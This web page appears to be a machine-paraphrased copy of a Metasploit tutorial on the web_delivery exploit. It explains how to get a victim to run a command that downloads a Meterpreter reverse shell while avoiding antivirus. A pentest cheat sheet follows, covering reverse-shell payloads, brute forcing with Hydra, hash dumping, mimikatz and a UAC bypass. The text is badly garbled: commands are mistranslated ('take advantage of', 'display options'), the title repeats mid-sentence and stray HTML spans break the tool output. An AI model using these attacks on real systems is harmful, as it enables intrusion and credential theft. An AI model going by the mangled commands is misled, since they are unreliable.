Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX 2023
Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX one in all my favourite hacking/pentesting equipment, has so many skills that even after my many tutorials,
I have best scratched the surface Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX:
of its abilties. for instance, it can be used with Nexpose for vulnerability scanning, with nmap for port scanning, and with its severa auxiliary modules, nearly limitless different hacking-related capabilities.
a number of the exploit modules, a class that we’ve not addressed are the internet delivery exploits. those exploits allow us to open a web server on the assault machine after which generate a easy script command that, while completed at the victim device, will open a Meterpreter shell at the target. This internet transport make the most can use Python, personal home page, or the windows PowerShell scripts.
Of route, it is your process to get the script on the target device.
which means that you’ll in all likelihood want to get physical get right of entry to to the machine or envelope the code right into a reputedly risk , we are able to take advantage of a Linux or Mac gadget. due to the fact that each are UNIX-like systems, they both have integrated Python interpreters with the aid of default. If we can get the script command generated with the aid of this make the most on the goal, we can have entire manipulate of the system which includes keystroke logging, turning on the webcam, recording from the microphone, and studying or deleting any files at the machine.
permit’s get began.
Step 1: Open a Terminal
step one, of course, is to hearth up Kali and open a terminal.
Step 2: begin Metasploit & Load the take advantage of
subsequent, start Metasploit through typing:
kali> msfconsole
This should open the msfconsole like that underneath.
Then we want to load the exploit:
msf > use exploit/multi/script/web_delivery
Set the IP of our attack system:
msf > set LHOST 192.168.181.153
And set the port we want to use:
msf > set LPORT 4444
Of direction, i am the usage of my private IP address in my lab, but if the target is outside your LAN, you’ll possibly want to use your public IP and then port ahead.
Step 3: display options
Now that we’ve the make the most loaded and equipped to head, allow’s test the alternatives for this take advantage of. kind:
msf > display options
It looks like we have all the options set as we want. Now, allow’s get a bit extra information on this make the most before we proceed. kind:
msf > information
As you can study above, this take advantage of begins an internet server on our assault system.
and, whilst the command that is generated is finished at the target gadget, a payload is downloaded to thee victim. similarly, this attack does no longer write to disk, so it ought to now not cause the antivirus software at the victim’s system.
Step 4: start the exploit
Our subsequent step is to run the take advantage of. This starts offevolved the net server on our assault device and also generates a Python command that we can use to connect to this web server. earlier than we try this, even though, we need to set the target to 0, selecting the Python take advantage of.
msf > set target zero
Now, we can type exploit:
msf > take advantage of
observe the closing issue this take advantage of writes is “Run the following command on the goal machine” observed with the aid of the command we want to use. reproduction this command.
Step five: Run the Command on the victim system
next, take that command to the sufferer system. In this situation, i’m the use of an Ubuntu 14.04 machine. you’ll need to precede the command with sudo as it requires root privileges.
Then hit enter. when you return for your Kali device, you may see a meterpreter has been began at the goal gadget!
We own that box!
to begin with, the Meterpreter is strolling in the heritage. To carry it to the foreground, we will type:
msf > sessions -l
This then brings the Meterpreter consultation to the foreground and we get the meterpreter spark off!
to manipulate the device, we can run the Meterpreter instructions or scripts, although maximum of the scripts are written for home windows systems.
Kali Linux is pre-established with extra than 600 penetration-testing programs, such as nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software program suite for penetration-testing wireless LANs), Burp suite and OWASP ZAP (each web utility safety scanners).
Kali Linux can run natively when installed on a laptop’s hard disk, can be booted from live USB, or it is able to run within a virtual machine. it’s far a supported platform of the Metasploit task’s Metasploit Framework, a device for developing and executing safety exploits.
In underneath check A-Z LINUX instructions
AWS PenTesting Lab With Kali Linux
Run Kali Linux On Raspberry Pi 4
a way to Configure Kali Linux on AWS Cloud?
how to hide documents In Kali Linux?
NMAP instructions
Nmap (“community Mapper”) is a unfastened and open supply utility for network discovery and security auditing. Many systems and community administrators also find it beneficial for duties which includes network stock, coping with service upgrade schedules, and tracking host or carrier uptime.
also study- NMAP commands Cheatsheet
Nmap makes use of uncooked IP packets in novel methods to decide what hosts are available on the network, what offerings (software call and version) those hosts are supplying, what running systems (and OS versions) they are going for walks, what sort of packet filters/firewalls are in use, and dozens of different characteristics.
It become designed to swiftly test huge networks, but works satisfactory towards single hosts. Nmap runs on all most important pc operating systems, and respectable binary programs are to be had for Linux, windows, and Mac OS X.
Command Description
nmap -v -sS -A -T4 goal – Nmap verbose scan, runs syn stealth, T4 timing (should be adequate on LAN), OS and carrier version information, traceroute and scripts in opposition to services
nmap -v -sS -p–A -T4 goal – As above however scans all TCP ports (takes plenty longer)
nmap -v -sU -sS -p- -A -T4 goal- As above but scans all TCP ports and UDP test (takes even longer)
nmap -v -p 445 –script=smb-check-vulns–script-args=unsafe=1 192.168.1.X- Nmap script to scan for inclined SMB servers – caution: unsafe=1 may motive knockover
ls /usr/proportion/nmap/scripts/* | grep ftp- search nmap scripts for key phrases
SMB enumeration
In pc networking, Server Message Block (SMB), one model of which became additionally referred to as common internet document gadget (CIFS), operates as an software-layer network protocol specifically used for offering shared access to documents, printers, and serial ports and miscellaneous communications among nodes on a community
Command Description
nbtscan 192.168.1.zero/24 – discover home windows / Samba servers on subnet, finds windows MAC addresses, netbios call and discover patron workgroup / domain
enum4linux -a target-ip Do the whole lot, runs all options (discover windows purchaser area / workgroup) apart from dictionary based totally percentage call guessing
different Host Discovery
different strategies of host discovery, that don’t use nmap
Command Description
netdiscover -r 192.168.1.zero/24- Discovers IP, MAC deal with and MAC dealer on the subnet from ARP, useful for confirming you’re at the proper VLAN at $consumer site
SMB Enumeration
Enumerate windows shares / Samba shares.
nbtscan 192.168.1.zero/24- find out windows / Samba servers on subnet, unearths windows MAC addresses, netbios name and find out customer workgroup / domain
enum4linux -a target-ip- Do everything, runs all alternatives (discover home windows patron area / workgroup) apart from dictionary primarily based percentage name guessing
Python nearby internet Server
Python local web server command, reachable for serving up shells and exploits on an attacking machine.
python -m SimpleHTTPServer 80 Run a primary http server, first rate for serving up shells and many others Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
Mounting file shares
the way to mount NFS / CIFS, home windows and Linux file stocks.
mount 192.168.1.1:/vol/proportion /mnt/nfs Mount NFS share to /mnt/nfs
mount -t cifs -o username=consumer,password=skip
,domain=blah //192.168.1.X/share-call /mnt/cifs Mount windows CIFS / SMB proportion on Linux at /mnt/cifs in case you put off password it’s going to activate at the CLI (extra comfortable as it wont grow to be in bash_history)
net use Z: \win-servershare passw ord Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsXMetasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
/person:domainjanedoe /savecred /p:no Mount a windows proportion on windows from the command line
apt-get set up smb4k -y set up smb4k on Kali, useful Linux GUI for browsing SMB shares
fundamental FingerPrinting
A device fingerprint or device fingerprint or browser fingerprint is records accrued about a remote computing tool for the cause of identity. Fingerprints may be used to completely or in part perceive person users or gadgets even when cookies are became off.
nc -v 192.168.1.1 25
telnet 192.168.1.1 25 – basic versioning / fingerprinting via displayed banner
SNMP Enumeration
SNMP enumeration is the manner of using SNMP to enumerate user bills on a target system. SNMP employs two predominant sorts of software program components for communique: the SNMP agent, that’s positioned on the networking device, and the SNMP management station, which communicates with the agent. Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
snmpcheck -t 192.168.1.X -c public
snmpwalk -c public -v1 192.168.1.X 1|
grep hrSWRunName|cut -d* * -f
snmpenum -t 192.168.1.X Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
onesixtyone -c names -i hosts
DNS zone Transfers
nslookup -> set kind=any -> ls -d blah.com windows DNS area switch
dig axfr blah.com @ns1.blah.com Linux DNS quarter transfer
DNSRecon
DNSRecon provides the ability to perform:
test all NS statistics for zone Transfers
Enumerate trendy DNS information for a given area (MX, SOA, NS, A, AAAA, SPF and TXT)
perform common SRV file Enumeration. pinnacle degree domain (TLD) enlargement
test for Wildcard resolution Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
Brute force subdomain and host A and AAAA facts given a site and a wordlist
perform a PTR record lookup for a given IP variety or CIDR
take a look at a DNS Server Cached information for A, AAAA and CNAME statistics supplied a list of host facts in a text record to test
Enumerate not unusual mDNS statistics inside the neighborhood community Enumerate Hosts and Subdomains using Google Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
DNS Enumeration Kali – DNSReconroot:~#
dnsrecon -d goal -D /usr/share/wordlists/dnsmap.txt -t std –xml ouput.xml
HTTP / HTTPS Webserver Enumeration
nikto -h 192.168.1.1 perform a nikto scan against target
dirbuster Configure through GUI, CLI input doesn’t paintings maximum of the time
Packet Inspection
tcpdump tcp port eighty -w output.pcap -i eth0 tcpdump for port eighty on interface eth0, outputs to output.pcap
Username Enumeration Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
a few strategies used to remotely enumerate customers on a target machine.
SMB consumer Enumeration
python /usr/share/document/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX-
Description- Enumerate users from SMB
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt RID cycle SMB /
Description- enumerate customers from SMB
SNMP consumer Enumeration Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25|reduce -d” “ -f4 –
Description- Enmerate users from SNMP Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
python /usr/proportion/document/python-impacket-document/examples/samrdump.py SNMP 192.168.X.XXX
Description- Enmerate customers from SNMP Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt(then grep)
Description- look for SNMP servers with nmap, grepable output
Passwords
Wordlists
/usr/share/wordlists – Linux phrase lists
Brute Forcing offerings
Hydra FTP Brute force Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
Hydra is a parallelized login cracker which supports severa protocols to assault. it is very speedy and bendy, and new modules are clean to feature. This tool makes it feasible for researchers and protection specialists to expose how clean it would be to advantage unauthorized get entry to to a system remotely. On Ubuntu it could be hooked up from the synaptic bundle manager. On Kali Linux, it is consistent with-installed Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX.
hydra -l USERNAME -P /usr/proportion/wordlistsnmap.lst -f
192.168.X.XXX ftp -V Hydra FTP brute pressure
Hydra POP3 Brute force
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX pop3 -V Hydra POP3 brute pressure
Hydra SMTP Brute pressure Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
hydra -P /usr/percentage/wordlistsnmap.lst 192.168.X.XXX smtp -V Hydra SMTP brute pressure
Use -t to limit concurrent connections, instance: -t 15
Password Cracking
John The Ripper – JTR Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
John the Ripper is different from equipment like Hydra.
Hydra does blind brute-forcing by using attempting username/password combos on a carrier daemon like ftp server or telnet server. John but wishes the hash first. So the greater challenge for a hacker is to first get the hash this is to be cracked Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX.
Now a days hashes are extra without difficulty crackable the usage of unfastened rainbow tables to be had online. simply visit one of the sites, submit the hash and if the hash is made of a not unusual phrase, then the website online could display the word nearly immediately. Rainbow tables basically shop not unusual words and their hashes in a large database. large the database, more the phrases covered Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX.
john –wordlist=/usr/proportion/wordlists/rockyou.txt hashes JTR password cracking
john –layout=descrypt –wordlist/usr/percentage/wordlists/rockyou.txt hash.txt JTR pressured descrypt cracking with wordlist
john –format=descrypt hash –show JTR pressured descrypt brute pressure cracking
also read- Metasploit commands Cheatsheet
Meterpreter Payloads
windows opposite meterpreter payload
set payload home windows/meterpreter/reverse_tcp home windows opposite tcp payload
windows VNC Meterpreter payload
set payload windows/vncinject/reverse_tcp Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
set ViewOnly false
Linux reverse Meterpreter payload Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
set payload linux/meterpreter/reverse_tcp Meterpreter Linux opposite Payload
Meterpreter Cheat Sheet
beneficial meterpreter commands.
add file c:\home windows Meterpreter upload report to home windows target
down load c:\windows\repair\sam /tmp Meterpreter download file from windows goal
down load c:\windows\restore\sam /tmp Meterpreter download document from windows target
execute -f c:\windowstempexploit.exe Meterpreter run .exe on course – handy for executing uploaded exploits
execute -f cmd -c Creates new channel with cmd shell
playstation Meterpreter display methods Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
shell Meterpreter get shell at the target
getsystem Meterpreter attempts priviledge escalation the target
hashdump Meterpreter tries to unload the hashes at the goal
portfwd add –l 3389 –p 3389 –r target Meterpreter create port ahea
d to target gadget
portfwd delete –l 3389 –p 3389 –r target Meterpreter delete port forward
not unusual Metasploit Modules Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
nearby windows Metasploit Modules (exploits)
use take advantage of/windows/nearby/bypassuac- bypass UAC on home windows 7 + Set target + arch, x86/sixty four
Auxilary Metasploit Modules
use auxiliary/scanner/http/dir_scanner Metasploit HTTP listing scanner
use auxiliary/scanner/http/jboss_vulnscan Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version Metasploit MSSQL model Scanner
use auxiliary/scanner/oracle/oracle_login Metasploit Oracle Login Module
Metasploit Powershell Modules Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
use exploit/multi/script/web_delivery Metasploit powershell payload shipping module
post/windows/manage/powershell/exec_powershell Metasploit upload and run powershell script thru a session
use take advantage of/multi/http/jboss_maindeployer Metasploit JBOSS set up
use exploit/home windows/mssql/mssql_payload Metasploit MSSQL payload
publish take advantage of home windows Metasploit Modules
run put up/windows/gather/win_privs Metasploit display privileges of cutting-edge consumer
use put up/windows/gather/credentials/gpp Metasploit grab GPP saved passwords
load mimikatz -> wdigest Metasplit load Mimikatz
run put up/home windows/collect/local_admin_search_enum identify other machines that the provided area user has administrative get entry to to Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
Amap
the primary next-era scanning tool for pentesters. It attempts to pick out applications even though they are jogging on a different port than ordinary Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX.
It additionally identifies non-ascii primarily based applications. that is finished with the aid of sending trigger packets, and searching up the responses in a list of response strings.
[email protected]:~# amap -bqv 192.168.1.15 80
the usage of cause report /and so on/amap/appdefs.trig … loaded 30 triggers
using reaction document /etc/amap/appdefs.resp … loaded 346 responses
using trigger file /etc/amap/appdefs.rpc … loaded 450 triggers Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
amap v5.4 (www.thc.org/thc-amap) started out at 2014-05-13 19:07:sixteen – software MAPPING mode
total quantity of responsibilities to perform in plain connect mode: 23
Protocol on 192.168.1.15:eighty/tcp (through cause ssl) suits http – banner: nn501 <span><org class=”hide”>method</org><sug class=”hide”>technique|method|approach</sug><new style=”color: #8e44ad;” class=”tipsBox”></new></span> <span><org class=”hide”>not</org><sug class=”hide”>now not|not|no longer</sug><new style=”color: #8e44ad;” class=”tipsBox”></new></span> <span><org class=”hide”>implemented</org><sug class=”hide”>implemented|carried out|applied</sug><new style=”color: #8e44ad;” class=”tipsBox”></new></span>nnmethod not carried outn to /index.html not supported.nnnApache/2.2.22 (Debian) Server at 12 Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX
Protocol on 192.168.1.15:eighty/tcp (by using trigger ssl) fits http-apache-2 – banner: nn501 <span><org class=”hide”>method</org><sug class=”hide”>technique|method|approach</sug><new style=”color: #8e44ad;” class=”tipsBox”></new></span> <span><org class=”hide”>not</org><sug class=”hide”>now not|not|no longer</sug><new style=”color: #8e44ad;” class=”tipsBox”></new></span> <span><org class=”hide”>implemented</org><sug class=”hide”>implemented|carried out|applied</sug><new style=”color: #8e44ad;” class=”tipsBox”></new></span>nnmethod no longer appliedn to /index.html not supported.nnnApache/2.2.22 (Debian) Server at 12
watching for timeout on 19 connections Metasploit Basics for Hackers Part 25 Web Delivery with Linux/UNIX/OsX …
Sources
